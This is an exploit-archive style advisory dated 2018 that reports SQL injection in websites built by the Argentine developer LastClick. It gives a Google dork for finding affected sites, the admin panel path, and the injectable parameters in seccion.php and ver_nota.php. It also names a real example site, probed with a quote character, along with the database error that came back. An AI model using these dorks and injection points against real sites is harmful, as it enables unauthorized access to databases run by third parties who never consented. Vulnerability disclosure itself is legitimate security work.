#################################################################################################
# Exploit Title : Diseño y Desarrollo LastClick Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/09/2018
# Vendor Homepage : lastclick.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Desarrollo: www.lastclick.com.ar | Corrientes - Argentina''
Admin Control Panel Path => /admin/index.php
# Exploit :
/seccion.php?pagina=[SQL Injection]
/seccion.php?pagina=[ID-NUMBER]&id=[SQL Injection]
/ver_nota.php?id=[SQL Injection]
#################################################################################################
# Example Site => saladasinforma.com.ar/seccion.php?pagina=437&id=3%27 => [ Proof of Concept ] => archive.is/7q7Xe
# SQL Database Error =>
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/saladasi/public_html/objetos/DBConnection.php on line 209
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################